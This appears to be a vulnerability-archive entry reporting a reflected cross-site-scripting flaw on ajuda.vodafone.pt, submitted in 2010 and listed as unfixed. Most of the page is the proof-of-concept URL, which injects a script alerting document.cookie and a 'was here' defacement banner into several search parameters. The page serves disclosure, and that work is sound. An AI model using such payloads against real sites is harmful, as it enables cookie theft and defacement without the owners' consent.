Security researcher isoz, has submitted on 14/05/2010 a cross-site-scripting (XSS) vulnerability affecting ajuda.vodafone.pt, which at the time of submission ranked 23913 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 19/05/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 14/05/2010 |
Date published: 19/05/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: isoz |
Domain: ajuda.vodafone.pt |
Category: XSS |
Pagerank: 23913 |
URL: https://ajuda.vodafone.pt/system/selfservice.controller?pageSize=10&CMD=ADV_SEARCH&KEYWORDS=%27%24%3 E%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3Eisoz%24w as%24here%3C%2Fh1%3E%3C%2Fmarquee%3E&TOPIC_NAME=Todos+os+t%C3%B3picos&SUBTOPIC_NAME=Todos+os+subt%C3 %B3picos&subTopicType=0&BOOL_SEARCHSTRING=+%26wtquote%3B%27%26wtquote%3B++and++%26wtquote%3B%3E%3C%2 Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3Eisoz+was+here% 3C%2Fh1%3E%3C%2Fmarquee%3E%26wtquote%3B+&SIDE_LINK_TOPIC_ID=&SIDE_LINK_SUB_TOPIC_ID=&searchString=%2 7%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3Eis oz+was+here%3C%2Fh1%3E%3C%2Fmarquee%3E&criterion=kb%3A%3Aarticle_search_data%23name%23string_text%23 all_of_these%23%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmar quee%3E%3Ch1%3Eisoz+was+here%3C%2Fh1%3E%3C%2Fmarquee%3E%23or%24kb%3A%3Aarticle_search_data%23article _key_words%23string_text%23all_of_these%23%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie %29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3Eisoz+was+here%3C%2Fh1%3E%3C%2Fmarquee%3E%23or%24&SUBTOPIC= -1&CONFIGURATION=1023&PARTITION_ID=1&EXPANDED_TOPIC_TREE_NODES=+1161+&USERTYPE=1&LANGUAGE=pt&COUNTRY =pt |
Click here to view the mirror
|
|
|